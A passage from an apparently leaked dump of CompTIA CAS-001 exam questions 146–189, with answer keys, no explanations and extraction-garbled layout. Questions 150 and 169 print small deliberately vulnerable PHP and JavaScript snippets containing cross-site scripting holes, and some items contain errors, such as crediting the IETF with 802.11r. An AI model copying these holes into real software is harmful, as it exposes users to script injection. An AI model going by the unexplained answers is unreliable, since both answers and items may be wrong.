A. Deployment of multiple standard images based on individual hardware configurations, employee choice of hardware and software requirements, tripleredundancy of all processing equipment.

B. Enforcement of strict network access controls and bandwidth minimization techniques, a single standard software image, high speed processing, and distributedbackups of all equipment in the datacenter.

C. Deployment of a unified VDI across all devices, SSD RAID in all servers, multiple identical hot sites, granting administrative rights to all users, backup of systemcritical data.

D. Enforcement of security policies on mobile/remote devices, standard images and device hardware configurations, multiple layers of redundancy, and backup onall storage devices.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:

Page 76: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation:

QUESTION 146The security administrator reports that the physical security of the Ethernet network has been breached, but the fibre channel storage network was not breached.Why might this still concern the storage administrator? (Select TWO).

A. The storage network uses FCoE.Real 73CompTIA CAS-001 Exam

B. The storage network uses iSCSI.C. The storage network uses vSAN.D. The storage network uses switch zoning.E. The storage network uses LUN masking.

Correct Answer: ABSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 147As part of a new wireless implementation, the Chief Information Officer's (CIO's) main objective is to immediately deploy a system that supports the 802.11rstandard, which will help wireless VoIP devices in moving vehicles. However, the 802.11r standard was not ratified by the IETF. The wireless vendor's products dosupport the pre-ratification version of 802.11r. The security and network administrators have tested the product and do not see any security or compatibility issues;however, they are concerned that the standard is not yet final. Which of the following is the BEST way to proceed?

A. Purchase the equipment now, but do not use 802.11r until the standard is ratified.B. Do not purchase the equipment now as the client devices do not yet support 802.11r.C. Purchase the equipment now, as long as it will be firmware upgradeable to the final 802.11r standard.D. Do not purchase the equipment now; delay the implementation until the IETF has ratified the final 802.11r standard.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

Page 77: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 148A firm's Chief Executive Officer (CEO) is concerned that its IT staff lacks the knowledge to identify complex vulnerabilities that may exist in the payment systembeing internally developed. The payment system being developed will be sold to a number of organizations and is in direct competition with another leading product.The CEO highlighted, in a risk management meeting that code base confidentiality is of upmost importance to allow the company to exceed the competition interms of product reliability, stability and performance. The CEO also highlighted that company reputation for secure products is extremely important. Which of thefollowing will provide the MOST thorough testing and satisfy the CEO's requirements?

A. Use the security assurance team and development team to perform Grey box testing.B. Sign a NDA with a large consulting firm and use the firm to perform Black box testing.

Real 74CompTIA CAS-001 Exam

C. Use the security assurance team and development team to perform Black box testing.D. Sign a NDA with a small consulting firm and use the firm to perform Grey box testing.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 149The security manager is in the process of writing a business case to replace a legacy secure web gateway so as to meet an availability requirement of 99.9%service availability. According to the vendor, the newly acquired firewall has been rated with an MTBF of 10,000 hours and has an MTTR of 2 hours. This equates to1.75 hours per year of downtime. Based on this, which of the following is the MOST accurate statement?

A. The firewall will meet the availability requirement because availability will be 99.98%.B. The firewall will not meet the availability requirement because availability will be 85%.C. The firewall will meet the availability requirement because availability will be 99.993%.D. The firewall will not meet the availability requirement because availability will be 99.2%.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 150What of the following vulnerabilities is present in the below source code file named `AuthenticatedArea.php'?

Page 78: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

<html><head><title>AuthenticatedArea</title></head>

<?

include ("/inc/common.php");

$username = $_REQUEST[`username'];

if ($username != "") {

echo "Your username is: " . $_REQUEST[`username'];

}else {

header)("location: /login.php"

Real 75CompTIA CAS-001 Exam}

?>

</html>

A. Header manipulationB. Account disclosureC. Unvalidated file inclusionD. Cross-site scripting

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 151There have been some failures of the company's customer-facing website. A security engineer has analyzed the root cause to be the WAF. System logs show thatthe WAF has been down for 14 total hours over the past month in four separate situations. One of these situations was a two hour scheduled maintenance activityaimed to improve the stability of the WAF. Which of the following is the MTTR, based on the last month's performance figures?

Page 79: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. 3 hoursB. 3.5 hoursC. 4 hoursD. 4.666 hours

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 152To support a software security initiative business case, a project manager needs to provide a cost benefit analysis. The project manager has asked the securityconsultant to perform a return on investment study. It has been estimated that by spending $300,000 on the software security initiative, a 30% savings in cost will berealized for each project. Based on an average of 8 software projects at a current cost of $50,000 each, how many years will it take to see a positive ROI?

A. Nearly four yearsB. Nearly six years

Real 76CompTIA CAS-001 Exam

C. Within the first yearD. Nearly three years

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 153During user acceptance testing, the security administrator believes to have discovered an issue in the login prompt of the company's financial system. Whileentering the username and password, the program crashed and displayed the system command prompt. The security administrator believes that one of the fieldsmay have been mistyped and wants to reproduce the issue to report it to the software developers. Which of the following should the administrator use to reproducethe issue?

A. The administrator should enter a username and use an offline password cracker in brute force mode.

Page 80: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

B. The administrator should use a network analyzer to determine which packet caused the system to crash.C. The administrator should extract the password file and run an online password cracker in brute force mode against the password file.D. The administrator should run an online fuzzer against the login screen.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 154A security administrator wants to perform an audit of the company password file to ensure users are not using personal information such as addresses andbirthdays as part of their password. The company employs 200,000 users, has virtualized environments with cluster and cloud-based computing resources, andenforces a minimum password length of 14 characters. Which of the following options is BEST suited to run the password auditing software and produce a report inthe SHORTEST amount of time?

A. The system administrator should take advantage of the company's cluster based computing resources, upload the password file to the cluster, and run thepassword cracker on that platform.

B. The system administrator should upload the password file to a virtualized de-duplicated storage system to reduce the password entries and run a passwordcracker on that file.

C. The system administrator should build a virtual machine on the administrator's desktop, transfer the password file to it, and run the a password cracker on thevirtual machine.Real 77CompTIA CAS-001 Exam

D. The system administrator should upload the password file to cloud storage and use on-demand provisioning to build a purpose based virtual machine to run apassword cracker on all the users.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 155The network administrator has been tracking the cause of network performance problems and decides to take a look at the internal and external router stats.

Real 78CompTIA CAS-001 Exam

Page 81: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 82: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 83: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Which of the following should the network administrator do to resolve the performance issue after analyzing the above information?

A. The IP TOS field of business related network traffic should be modified accordingly.B. The TCP flags of business related traffic should be modified accordingly.C. An ACL should be placed on the external router to drop incoming ICMP packets.

Real 79CompTIA CAS-001 Exam

D. An ACL should be placed on the internal router to drop layer 4 packets to and from port 0.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 156The security administrator at `company.com' is reviewing the network logs and notices a new UDP port pattern where the amount of UDP port 123 packets hasincreased by 20% above the baseline. The administrator runs a packet capturing tool from a server attached to a SPAN port and notices the following.

UDP 192.168.0.1:123 -> 172.60.3.0:123

UDP 192.168.0.36:123 -> time.company.com

UDP 192.168.0.112:123 -> 172.60.3.0:123

UDP 192.168.0.91:123 -> time.company.com

UDP 192.168.0.211:123 -> 172.60.3.0:123

UDP 192.168.0.237:123 -> time.company.com

UDP 192.168.0.78:123 -> 172.60.3.0:123

The corporate HIPS console reports an MD5 hash mismatch on the svchost.exe file of the following computers:

192.168.0.1

192.168.0.112

Page 84: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

192.168.0.211

192.168.0.78

Which of the following should the security administrator report to upper management based on the above output?

A. An NTP client side attack successfully exploited some hosts.B. A DNS cache poisoning successfully exploited some hosts.C. An NTP server side attack successfully exploited some hosts.D. A DNS server side attack successfully exploited some hosts.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Real 80CompTIA CAS-001 Exam

Explanation:

QUESTION 157A mid-level company is rewriting its security policies and has halted the rewriting progress because the company's executives believe that its major vendors, whohave cultivated a strong personal and professional relationship with the senior level staff, have a good handle on compliance and regulatory standards. Therefore,the executive level managers are allowing vendors to play a large role in writing the policy. Having experienced this type of environment in previous positions, andbeing aware that vendors may not always put the company's interests first, the IT Director decides that while vendor support is important, it is critical that thecompany writes the policy objectively. Which of the following is the recommendation the IT Director should present to senior staff?

A. 1) Consult legal, moral, and ethical standards; 2) Draft General Organizational Policy; 3) Specify Functional Implementing Policies; 4) Allow vendors to reviewand participate in the establishment of focused compliance standards, plans, and procedures

B. 1) Consult legal and regulatory requirements; 2) Draft General Organizational Policy; 3) Specify Functional Implementing Policies; 4) Establish necessarystandards, procedures, baselines, and guidelines

C. 1) Draft General Organizational Policy; 2) Establish necessary standards and compliance documentation; 3) Consult legal and industry security experts; 4)Determine acceptable tolerance guidelines

D. 1) Draft a Specific Company Policy Plan; 2) Consult with vendors to review and collaborate with executives; 3) Add industry compliance where needed; 4)Specify Functional Implementing Policies

Correct Answer: BSection: (none)Explanation

Page 85: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

QUESTION 158A Chief Information Security Officer (CISO) has been trying to eliminate some IT security risks for several months. These risks are not high profile but still exist.Furthermore, many of these risks have been mitigated with innovative solutions. However, at this point in time, the budget is insufficient to deal with the risks. Whichof the following risk strategies should be used?

A. Transfer the risksB. Avoid the risksC. Accept the risksD. Mitigate the risks

Real 81CompTIA CAS-001 Exam

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 159The firm's CISO has been working with the Chief Procurement Officer (CPO) and the Senior Project Manager (SPM) on soliciting bids for a series of HIPS andNIPS products for a major installation in the firm's new Hong Kong office. After reviewing RFQs received from three vendors, the CPO and the SPM have notgained any real data regarding the specifications about any of the solutions and want that data before the procurement continues. Which of the following will theCPO and SPM have the CISO do at this point to get back on track in this procurement process?

A. Ask the three submitting vendors for a full blown RFP so that the CPO and SPM can move to the next step.B. Contact the three submitting vendor firms and have them submit supporting RFIs to provide more detailed information about their product solutions.C. Provide the CPO and the SPM a personalized summary from what the CISO knows about these three submitting vendors.D. Inform the three submitting vendors that there quotes are null and void at this time and that they are disqualified based upon their RFQs.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Page 86: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 160To prevent a third party from identifying a specific user as having previously accessed a service provider through an SSO operation, SAML uses which of thefollowing?

A. Transient identifiersB. SOAP callsC. Discovery profilesD. Security bindings

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 161Real 82CompTIA CAS-001 ExamSAML entities can operate in a variety of different roles. Valid SAML roles include which of the following?

A. Attribute authority and certificate authorityB. Certificate authority and attribute requestorC. Identity provider and service providerD. Service provider and administrator

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 162A financial institution has decided to purchase a very expensive resource management system and has selected the product and vendor. The vendor isexperiencing some minor, but public, legal issues. Senior management has some concerns on maintaining this system should the vendor go out of business. Whichof the following should the Chief Information Security Officer (CISO) recommend to BEST limit exposure?

Page 87: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Include a source code escrow clause in the contract for this system.B. Require proof-of-insurance by the vendor in the RFP for this system.C. Include a penalty clause in the contract for this system.D. Require on-going maintenance as part of the SLA for this system.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 163A company decides to purchase COTS software. This can introduce new security risks to the network. Which of the following is the BEST description of why this istrue?

A. COTS software is typically well known and widely available. Information concerning vulnerabilities and viable attack patterns are never revealed by the developerto avoid a lawsuit.

B. COTS software is not well known and is only available in limited quantities. Information concerning vulnerabilities is kept internal to the company that developedthe software.

C. COTS software is well known and widely available. Information concerning vulnerabilities and viable attack patterns is typically ignored within the IT community.D. COTS software is well known and widely available. Information concerning vulnerabilities and viable attack patterns is typically shared within the IT community.

Real 83CompTIA CAS-001 Exam

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 164Which of the following is a security concern with deploying COTS products within the network?

A. It is difficult to verify the security of COTS code because the source is available to the customer and it takes significant man hours to sort through it.B. COTS software often provides the source code as part of the licensing agreement and it becomes the company's responsibility to verify the security.C. It is difficult to verify the security of COTS code because the source is not available to the customer in many cases.D. COTS source code is readily available to the customer in many cases which opens the customer's network to both internal and external attacks.

Page 88: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 165The database team has suggested deploying a SOA based system across the enterprise. The Chief Information Officer (CIO) has decided to consult the securitymanager about the risk implications for adopting this architecture. Which of the following are concerns that the security manager should present to the CIOconcerning the SOA system? (Select TWO).

A. Users and services are centralized and only available within the enterprise.B. Users and services are distributed, often times over the InternetC. SOA centrally manages legacy systems, and opens the internal network to vulnerabilities.D. SOA abstracts legacy systems as a virtual device and is susceptible to VMEscape.E. SOA abstracts legacy systems as web services, which are often exposed to outside threats.

Correct Answer: BESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 166The security team for Company XYZ has determined that someone from outside the organization

Real 84CompTIA CAS-001 Examhas obtained sensitive information about the internal organization by querying the external DNS server of the company. The security manager is tasked with makingsure this problem does not occur in the future. How would the security manager address this problem?

A. Implement a split DNS, only allowing the external DNS server to contain information about domains that only the outside world should be aware, and an internalDNS server to maintain authoritative records for internal systems.

B. Implement a split DNS, only allowing the external DNS server to contain information about internal domain resources that the outside world would be interestedin, and an internal DNS server to maintain authoritative records for internal systems.

C. Implement a split DNS, only allowing the external DNS server to contain information about domains that only the outside world should be aware, and an internalDNS server to maintain non- authoritative records for external systems.

Page 89: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. Implement a split DNS, only allowing the internal DNS server to contain information about domains the outside world should be aware of, and an external DNSserver to maintain authoritative records for internal systems.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 167Unit testing for security functionality and resiliency to attack, as well as developing secure code and exploit mitigation, occur in which of the following phases of theSecure Software Development Lifecycle?

A. Secure Software RequirementsB. Secure Software ImplementationC. Secure Software DesignD. Software Acceptance

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 168Which of the following are security components provided by an application security library or framework? (Select THREE).

A. Authorization databaseReal 85CompTIA CAS-001 Exam

B. Fault injectionC. Input validationD. Secure loggingE. Directory servicesF. Encryption and decryption

Correct Answer: CDF

Page 90: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Section: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 169Which of the following potential vulnerabilities exists in the following code snippet?

var myEmail = document.getElementById("formInputEmail").value;

if (xmlhttp.readyState==4 && xmlhttp.status==200)

{

Document.getElementById("profileBox").innerHTML = "Emails will be sent to " + myEmail + xmlhttp.responseText;

}

A. Javascript buffer overflowB. AJAX XHR weaknessesC. DOM-based XSSD. JSON weaknesses

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 170The Chief Information Security Officer (CISO) has just returned from attending a security conference and now wants to implement a Security Operations Center(SOC) to improve and coordinate the detection of unauthorized access to the enterprise. The CISO's biggest concern is the increased number of attacks that thecurrent infrastructure cannot detect. Which of the following is MOST likely to be used in a SOC to address the CISO's concerns?

A. DLP, Analytics, SIEM, Forensics, NIPS, HIPS, WIPS and eGRC Real 86CompTIA CAS-001 Exam

B. Forensics, White box testing, Log correlation, HIDS, and SSOC. Vulnerability assessments, NIDP, HIDS, SCAP, Analytics and SIEM

Page 91: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. eGRC, WIPS, Federated ID, Network enumerator, NIPS and Port Scanners

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 171The IT Manager has mandated that an extensible markup language be implemented which can be used to exchange provisioning requests and responses foraccount creation. Which of the following is BEST able to achieve this?

A. XACMLB. SAMLC. SOAPD. SPML

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 172A company is planning to deploy an in-house Security Operations Center (SOC).

One of the new requirements is to deploy a NIPS solution into the Internet facing environment.

The SOC highlighted the following requirements:

- Perform fingerprinting on unfiltered inbound traffic to the company- Monitor all inbound and outbound traffic to the DMZ's

In which of the following places should the NIPS be placed in the network?

A. In front of the Internet firewall and in front of the DMZsB. In front of the Internet firewall and in front of the internal firewallC. In front of the Internet firewall and behind the internal firewall

Page 92: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. Behind the Internet firewall and in front of the DMZs

Correct Answer: ASection: (none)Explanation

Explanation/Reference:answer is updated.

QUESTION 173A company recently experienced a malware outbreak. It was caused by a vendor using an approved non-company device on the company's corporate network thatimpacted manufacturing lines, causing a week of downtime to recover from the attack.

Which of the following reduces this threat and minimizes potential impact on the manufacturing lines?

A. Disable remote access capabilities on manufacturing SCADA systems.B. Require a NIPS for all communications to and from manufacturing SCADA systems.C. Add anti-virus and client firewall capabilities to the manufacturing SCADA systems.D. Deploy an ACL that restricts access from the corporate network to the manufacturing SCADA systems.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 174Capital Reconnaissance, LLC is building a brand new research and testing location, and the physical security manager wants to deploy IP-based access control andvideo surveillance. These two systems are essential for keeping the building open for operations. Which of the following controls should the security administratorrecommend to determine new threats against the new IP-based access control and video surveillance systems?

A. Develop a network traffic baseline for each of the physical security systems.B. Air gap the physical security networks from the administrative and operational networks.C. Require separate non-VLANed networks and NIPS for each physical security system network.D. Have the Network Operations Center (NOC) review logs and create a CERT to respond to breaches.

Correct Answer: ASection: (none)

Page 93: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation

Explanation/Reference:Explanation:

QUESTION 175Real 88CompTIA CAS-001 ExamA company has recently implemented a video conference solution that uses the H.323 protocol. The security engineer is asked to make recommendations on howto secure video conferences to protect confidentiality. Which of the following should the security engineer recommend?

A. Implement H.235 extensions with DES to secure the audio and video transport.B. Recommend moving to SIP and RTP as those protocols are inherently secure.C. Recommend implementing G.711 for the audio channel and H.264 for the video.D. Encapsulate the audio channel in the G.711 codec rather than the unsecured Speex.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 176A healthcare company recently purchased the building next door located on the same campus. The building previously did not have any IT infrastructure. Thebuilding manager has selected four potential locations to place IT equipment consisting of a half height open server rack with five switches, a router, a firewall, andtwo servers. Given the descriptions below, where would the security engineer MOST likely recommend placing the rack?

The Boiler Room: The rack can be placed 5 feet (1.5 meters) up on the wall, between the second and third boiler. The room is locked and only maintenance hasaccess to it.

The Reception AreA. The reception area is an open area right as customers enter. There is a closet 5 feet by 5 feet (1.5 meters by 1.5 meters) that the rack will beplaced in with floor mounts. There is a 3 digit PIN lock that the receptionist sets.

The Rehabilitation AreA. The rack needs to be out of the way from patients using the whirlpool bath, so it will be wall mounted 8 feet (2.4 meters) up as the area hashigh ceilings. The rehab area is staffed full time and admittance is by key card only.

The Finance AreA. There is an unused office in the corner of the area that can be used for the server rack. The rack will be floor mounted. The finance area islocked and alarmed at night.

A. The Rehabilitation Area

Page 94: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

B. The Reception AreaC. The Boiler RoomD. The Finance Area

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

Real 89CompTIA CAS-001 Exam

QUESTION 177A network security engineer would like to allow authorized groups to access network devices with a shell restricted to only show information while still authenticatingthe administrator's group to an unrestricted shell. Which of the following can be configured to authenticate and enforce these shell restrictions? (Select TWO).

A. Single Sign OnB. Active DirectoryC. KerberosD. NIS+E. RADIUSF. TACACS+

Correct Answer: EFSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 178An administrator is unable to connect to a server via VNC.

Upon investigating the host firewall configuration, the administrator sees the following lines:

- A INPUT -m state --state NEW -m tcp -p tcp --dport 3389 -j DENY- A INPUT -m state --state NEW -m tcp -p tcp --dport 22 -j DENY

Page 95: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

- A INPUT -m state --state NEW -m tcp -p tcp --dport 10000 -j ACCEPT- A INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j DENY- A INPUT -m state --state NEW -m tcp -p tcp --sport 3389 -j ACCEPT

Which of the following should occur to allow VNC access to the server?

A. DENY needs to be changed to ACCEPT on one line.B. A line needs to be added.C. A line needs to be removed.D. Fix the typo in one line.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 179Real 90CompTIA CAS-001 ExamCompany A is trying to implement controls to reduce costs and time spent on litigation.

To accomplish this, Company A has established several goals:

- Prevent data breaches from lost/stolen assets- Reduce time to fulfill e-discovery requests- Prevent PII from leaving the network- Lessen the network perimeter attack surface- Reduce internal fraud

Which of the following solutions accomplishes the MOST of these goals?

A. Implement separation of duties; enable full encryption on USB devices and cell phones, allow cell phones to remotely connect to e-mail and network VPN,enforce a 90 day data retention policy.

B. Eliminate VPN access from remote devices. Restrict junior administrators to read-only shell access on network devices. Install virus scanning and SPAMfiltering. Harden all servers with trusted OS extensions.

C. Create a change control process with stakeholder review board, implement separation of duties and mandatory vacation, create regular SAN snapshots, enableGPS tracking on all cell phones and laptops, and fully encrypt all email in transport.

D. Implement outgoing mail sanitation and incoming SPAM filtering. Allow VPN for mobile devices; cross train managers in multiple disciplines, ensure all corporate

Page 96: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

USB drives are provided by Company A and de-duplicate all server storage.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 180A security architect is seeking to outsource company server resources to a commercial cloud service provider. The provider under consideration has a reputationfor poorly controlling physical access to datacenters and has been the victim of multiple social engineering attacks. The service provider regularly assigns VMs frommultiple clients to the same physical resources. When conducting the final risk assessment which of the following should the security architect take intoconsideration?

A. The ability to implement user training programs for the purpose of educating internal staff about the dangers of social engineering.B. The cost of resources required to relocate services in the event of resource exhaustion on a particular VM.C. The likelihood a malicious user will obtain proprietary information by gaining local access to the hypervisor platform.

Real 91CompTIA CAS-001 Exam

D. Annual loss expectancy resulting from social engineering attacks against the cloud service provider affecting corporate network infrastructure.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 181The root cause analysis of a recent security incident reveals that an attacker accessed a printer from the Internet. The attacker then accessed the print server,using the printer as a launch pad for a shell exploit. The print server logs show that the attacker was able to exploit multiple accounts, ultimately launching asuccessful DoS attack on the domain controller.

Defending against which of the following attacks should form the basis of the incident mitigation plan?

A. DDoSB. SYN floodC. Buffer overflow

Page 97: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. Privilege escalation

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 182An existing enterprise architecture included an enclave where sensitive research and development work was conducted. This network enclave also served as astorage location for proprietary corporate data and records. The initial security architect chose to protect the enclave by restricting access to a single physical porton a firewall. All downstream network devices were isolated from the rest of the network and communicated solely through the single 100mbps firewall port. Overtime, researchers connected devices on the protected enclave directly to external resources and corporate data stores. Mobile and wireless devices were alsoadded to the enclave to support high speed data research. Which of the following BEST describes the process which weakened the security posture of the enclave?

A. Emerging business requirements led to the de-perimiterization of the network.B. Emerging security threats rendered the existing architecture obsolete.C. The single firewall port was oversaturated with network packets.D. The shrinking of an overall attack surface due to the additional access.

Real 92CompTIA CAS-001 Exam

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 183At one time, security architecture best practices led to networks with a limited number (1-3) of network access points. This restriction allowed for the concentrationof security resources and resulted in a well defined attack surface. The introduction of wireless networks, highly portable network devices, and cloud serviceproviders has rendered the network boundary and attack surface increasingly porous. This evolution of the security architecture has led to which of the following?

A. Increased security capabilities, the same amount of security risks and a higher TCO but a smaller corporate datacenter on average.B. Increased business capabilities and increased security risks with a lower TCO and smaller physical footprint on the corporate network.C. Increased business capabilities and increased security risks with a higher TCO and a larger physical footprint.D. Decreased business capabilities and increased security risks with a lower TCO and increased logical footprint due to virtualization.

Page 98: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 184An administrator notices the following file in the Linux server's /tmp directory.

-rwsr-xr-x. 4 root root 234223 Jun 6 22:52 bash*

Which of the following should be done to prevent further attacks of this nature?

A. Never mount the /tmp directory over NFSB. Stop the rpcidmapd service from runningC. Mount all tmp directories nosuid, noexecD. Restrict access to the /tmp directory

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

Real 93CompTIA CAS-001 Exam

QUESTION 185Company ABC has entered into a marketing agreement with Company XYZ, whereby ABC will share some of its customer information with XYZ. However, XYZ canonly contact ABC customers who explicitly agreed to being contacted by third parties. Which of the following documents would contain the details of this marketingagreement?

A. BPAB. ISAC. NDAD. SLA

Page 99: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 186Company ABC has a 100Mbps fiber connection from headquarters to a remote office 200km (123 miles) away. This connection is provided by the local cabletelevision company. ABC would like to extend a secure VLAN to the remote office, but the cable company says this is impossible since they already use VLANs ontheir internal network. Which of the following protocols should the cable company be using to allow their customers to establish VLANs to other sites?

A. IS-ISB. EIGRPC. MPLSD. 802.1q

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 187An ecommerce application on a Linux server does not properly track the number of incoming connections to the server and may leave the server vulnerable towhich of following?

A. Buffer Overflow AttackReal 94CompTIA CAS-001 Exam

B. Storage Consumption AttackC. Denial of Service AttackD. Race Condition

Correct Answer: CSection: (none)Explanation

Page 100: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:corrected.

QUESTION 188Company A has a remote work force that often includes independent contractors and out of state full time employees.

Company A's security engineer has been asked to implement a solution allowing these users to collaborate on projects with the following goals:

- All communications between parties need to be encrypted in transport- Users must all have the same application sets at the same version- All data must remain at Company A's site- All users must not access the system between 12:00 and 1:00 as that is the maintenance window- Easy to maintain, patch and change application environment

Which of the following solutions should the security engineer recommend to meet the MOST goals?

A. Create an SSL reverse proxy to a collaboration workspace. Use remote installation service to maintain application version. Have users use full desktopencryption. Schedule server downtime from 12:00 to 1:00 PM.

B. Install an SSL VPN to Company A's datacenter, have users connect to a standard virtual workstation image, set workstation time of day restrictions.C. Create an extranet web portal using third party web based office applications. Ensure that Company A maintains the administrative access.D. Schedule server downtime from 12:00 to 1:00 PM, implement a Terminal Server Gateway, use remote installation services to standardize application on user's

laptops.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 189A startup company offering software on demand has hired a security consultant to provide expertise on data security. The company's clients are concerned aboutdata confidentiality. The security consultant must design an environment with data confidentiality as the top priority, over

